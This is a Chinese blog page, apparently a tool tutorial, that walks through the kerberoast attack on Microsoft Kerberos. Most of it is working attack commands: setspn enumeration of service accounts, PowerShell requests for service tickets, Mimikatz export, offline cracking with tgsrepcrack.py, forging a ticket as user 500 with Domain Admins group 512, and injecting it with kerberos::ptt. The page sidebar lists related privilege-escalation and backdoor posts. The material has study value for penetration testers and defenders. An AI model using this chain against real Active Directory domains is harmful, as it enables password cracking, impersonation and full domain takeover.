- 浏览: 290926 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
项目地址:https://github.com/nidem/kerberoast
kerberoast是用来攻击微软Kerberos的实现。
使用window自带攻击提取SPN user
请求一个ticket
请求所有ticket
配合Mimikatz从ram中提取获得的ticket
使用rgsrepcrack破解
重写:
把user添加到另一个group中,在本例中是域管理员组
使用Mimikatz注入到ram
kerberoast是用来攻击微软Kerberos的实现。
PS C:> setspn -T medin -Q /
使用window自带攻击提取SPN user
PS C:> Add-Type -AssemblyName System.IdentityModel PS C:> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
请求一个ticket
PS C:> Add-Type -AssemblyName System.IdentityModel PS C:> setspn.exe -T medin.local -Q / | Select-String '^CN' -Context 0,1 | % { New-Object System. IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
请求所有ticket
mimikatz # kerberos::list /export
配合Mimikatz从ram中提取获得的ticket
/tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
使用rgsrepcrack破解
重写:
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500确保user看上去是另一个不同的user
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
把user添加到另一个group中,在本例中是域管理员组
kerberos::ptt sql.kirbi
使用Mimikatz注入到ram
发表评论
-
[图] windows 10
2015-08-18 20:37 314网上下载的图片,忘了来源 -
windows提权集合
2015-06-30 00:23 602https://blog.netspi.com/5-ways- ... -
[转]Access to every PC and become local Admin
2015-06-29 21:50 535原文地址:http://www.gosecure.it/blo ... -
[转]Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network
2015-06-29 21:46 1682原文地址:https://www.trustwave.com/ ... -
[转]如何获得window管理员权限
2015-06-29 21:21 482引用A tutorial on how to get into ... -
Window提权基本步骤
2015-06-03 22:00 784原文地址: http://www.fuzzysecurity. ... -
[转]malware persistence
2015-05-06 23:46 414原文地址:http://jumpespjump.blogspo ... -
[转]backdoor a windows domain
2015-05-06 22:56 505原文地址:http://jumpespjump.blogspo ... -
[译]解密MSSQL密码
2015-03-26 00:43 2886原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 331原文地址:http://blog.gdssecurity.co ... -
window增加硬盘性能方法
2015-02-05 01:03 357参考地址:http://way2h.blogspot.com/ ... -
[译]Skeleton Key Malware & Mimikatz
2015-01-28 20:29 812原文地址: http://adsecurity.org/?p= ... -
绕过PowerShell执行策略的15种方法
2015-01-28 02:27 999https://blog.netspi.com/15-ways ... -
[译]Veil-Pillage
2015-01-23 03:09 850原文地址:http://resources.infosecin ... -
[翻译]oledump: Extracting Embedded EXE From DOC
2015-01-04 22:40 950原文地址:http://blog.didierstevens. ... -
[工具]volatility----Windows内存取证
2015-01-04 22:01 1549下载地址:https://github.com/volatil ... -
[译]Windows提权:ahcache.sys/NtApphelpCacheControl
2015-01-03 21:12 1034原文地址:https://code.google.com/p/ ... -
[译]使用Volatility从memory dump获得密码
2014-12-30 12:27 3829原文地址:https://cyberarms.wordpres ... -
vmss2core将VMware镜像转换成memory dump
2014-12-26 23:59 0参考:http://kb.vmware.com/selfser ... -
Windows工具集
2014-12-25 00:54 540参考:https://community.rapid7.com ...
相关推荐
资源来自pypi官网,解压后可用。 资源全名:kerberoast-0.0.7-py3-none-any.whl
kerberoast Kerberos攻击工具包-纯python- 安装 pip3 install kerberoast 前提条件 Python 3.6参见requirements.txt 对于急躁的人 重要说明:LDAP和Kerberos可接受的目标URL格式如下<ldap> : <protocol>+<auth>:/...
使用修改后的KDC选项和加密类型绕过Kerberoast检测
用于自动创建Kerberos服务帐户的Honey凭证: ... 为了避免出现误报检测,您可以创建一个服务帐户蜜罐来检测非洲菊苣: 要求:-生成SPN工件,以检测在嘈杂的环境中出现的角化现象-此powershell脚本应由具有创建Active ...
Kerberoast.ps1 枚举域SPN服务账号字典枚举 克尔布鲁特 枚举域用户字典枚举 聪明的野兽 枚举域用户暴力破解 哈希猫 密码破解端口转发 端口转换器 端口转发、端口映射端口转发 流转移 端口转发、端口映射漏洞利用 ...
0x00 kerberos协议0x01 ntlm协议0x02 看两个项目0x03 项目0x04 smb协议0x05 windows访问控制0x06 耶稣窃取0x07 SPN扫描&kerberoast0x08 黄金票据0x09 白银票据0x10 MS140680x11 RPC 协议0x12 DCOM 协议0x13 大众...
然而,Kerberos也存在安全漏洞,如Kerberoast爆破和Pass the Ticket攻击。 Kerberoast攻击是针对服务账户的弱密码策略,攻击者通过获取服务的SPN(Service Principal Name)并请求加密类型为RC4_HMAC_MD5的TGS,...
Rubeus.exe kerberoast /user:<user> /rc4 ``` #### 七、总结 通过上述步骤和技术,我们可以有效地进行AD域渗透测试,包括前期准备、安全绕过、凭证提取等多个方面。每一步都旨在帮助测试人员更好地理解目标系统...
另外,Kerberoast攻击也是针对活动目录常见的攻击手段,攻击者可以利用有效的用户身份验证票证(TGT)去请求目标服务的服务票证,并通过离线破解得到目标服务帐号的HASH。 针对活动目录的安全防护方案应包括以下几...
- **Kerberoast**:攻击者请求弱加密服务票据,然后离线破解密码。通过检测非标准的Kerberos票据请求,可以发现此类攻击。 - **Golden Ticket**:攻击者创建伪造的Kerberos票证,长期访问受保护资源。检测Golden ...
它的功能已通过“ kerberoast”动作并入Rubeus,该动作提供了正确的ASN.1结构解析。 SharpRoast SharpRoast是各种Powe的C#端口。此项目现已弃用。 它的功能已通过“ kerberoast”动作并入Rubeus,该动作提供了正确...
分享从某企业AD被入侵说起,引申出对一些常见的攻击方式的归纳(如SYSVOL与GPP漏洞、MS14-068漏洞、Kerberoast攻击、内网横移抓取管理员凭证等),并最终提出如何应对的安全防护方案。 活动目录介绍 常见攻击方式 ...
domainWeakPasswdCheck domainAccountCheck-v2.0说明 ...kerberoast目录下是导出ST的添加所用到的ps脚本 hashcat目录下是爆破用到的工具 result目录下是包含运行产生的一些结果 allUserAndSPNList.txt :用户名与对应的
如何使用蜜罐检测出Kerberoast漏洞使用反鉴识技术欺骗蓝队Endlessh:SSH Tarpit 蜜罐实用指南了解如何逐步部署Honeypot并可视化其数据绕过LLMNR / NBT-NS蜜罐RDP蜜罐Sysdig和Falco的高交互蜜罐检测网络上的Mimikatz...
列表中会涵盖Kerberoast、Golden Ticket等攻击技术,以及相关的防御措施。 6. **权限提升**: 权限提升是攻击者获得更高系统访问权限的关键步骤。Awesome-Windows-Red-Team包含了许多用于检测和利用权限漏洞的工具...
SimpleHTTPTransfer 只是一个小脚本,可...列表curl http://10.10.14.10:5000/ 下载curl http://10.10.14.10:5000/Invoke-Kerbeoast.ps1 > Invoke-Kerberoast.ps1 上载curl http://10.10.14.10:5000/ -F 'file=hash'
cobalt_strike_extension_kit 想要为目前的许多技术提供一揽子服务吗? 克隆这个。 对于这项工作中的大部分,我都没有表示赞赏。 大部分工作受Outflank,Spectre Ops(0xThirteen)的影响,以及其他Aggressor脚本...